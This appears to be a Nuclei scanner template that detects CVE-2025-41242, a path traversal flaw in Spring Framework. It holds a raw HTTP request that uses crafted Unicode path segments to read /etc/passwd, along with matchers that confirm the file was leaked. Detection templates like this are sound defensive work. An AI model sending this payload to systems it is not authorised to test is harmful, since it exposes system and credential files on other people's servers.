id: CVE-2025-41242 info: name: Spring Framework - Path Traversal author: DhiyaneshDk severity: medium description: | Spring Framework MVC applications deployed as WAR or with embedded Servlet containers that do not reject suspicious URI sequences and serve static resources with Spring resource handling contain a path traversal vulnerability, letting attackers access unauthorized files, exploit requires non-compliant Servlet container configuration. reference: - https://x.com/phithon_xg/status/2048853566564221372 - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2025-41242 - https://i.blackhat.com/Asia-26/Presentations/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf - https://nvd.nist.gov/vuln/detail/CVE-2025-41242 impact: | Attackers can access unauthorized files via path traversal, potentially exposing sensitive data or system files. remediation: | Upgrade to the latest Spring Framework version and ensure deployment on compliant Servlet containers with default security features enabled. classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2025-41242 epss-score: 0.02054 epss-percentile: 0.793 cwe-id: CWE-22 metadata: verified: true max-request: 1 tags: cve,cve2025,spring,jetty,lfi,uri http: - raw: - |+ GET /阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/阮严灵丰丰甲来/etc/passw%64 HTTP/1.1 Host: {{Hostname}} Connection: close unsafe: true matchers: - type: dsl dsl: - regex('root:.*:0:0:', body) - contains(header, "application/octet-stream") - status_code == 200 condition: and # digest: 4b0a00483046022100de4e8f83f5fda0106788ac753227f3550febbf1b7462fe19a35ec5ee5c5cd773022100f4f15531bbaab72911af7c767376e6a2b4e5728e32993a00c80a3fdd0aa0f5f7:922c64590222798bb761d5b6d8e72950